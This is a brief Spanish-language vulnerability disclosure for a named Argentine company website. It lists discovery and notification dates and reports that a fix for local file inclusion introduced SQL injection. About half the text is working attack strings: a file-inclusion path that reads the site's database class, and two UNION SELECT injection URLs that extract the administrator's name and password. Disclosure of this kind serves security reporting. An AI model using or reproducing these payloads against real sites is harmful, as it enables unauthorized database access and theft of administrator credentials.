Sitio web: ww
w.alm
atec.com
.ar
Descubridor: Ari-Slash
URL del aviso: h4ckv
i505.wordpress.com/2010/09/25/vulnerabilidad-ww
w-alma
tec-com-ar/
Fecha de descubrimiento: 20 Enero 2010
Fecha de notificación: 20 de Enero 2010
Fecha de publicación: 25 de septiembre 2010
Arreglado: Si, pero ahora da lugar a un SQLI
Vulnerabilidad: LFI, SQLI y BLIND SQLI
Informacion adicional: el arreglo consistio en dar un id unico a cada archivo que se subia, de la forma download.php?id=
pero esa solucion dio lugar a sqli, siempre tomando el 2 campo del select debido a que debian retornarse cierta cantidad de columnas.
LFI (reparado):
download.php?file=admin/includes/Class.DB.php
SQLI:
descargas2.php?id=4%20union%20select%20id,nombre,password,4%20from%20administrador%20where%20id=1;--
descargas2.php?id=4%20union%20select%20id,password,nombre,4%20from%20administrador%20where%20id=1;--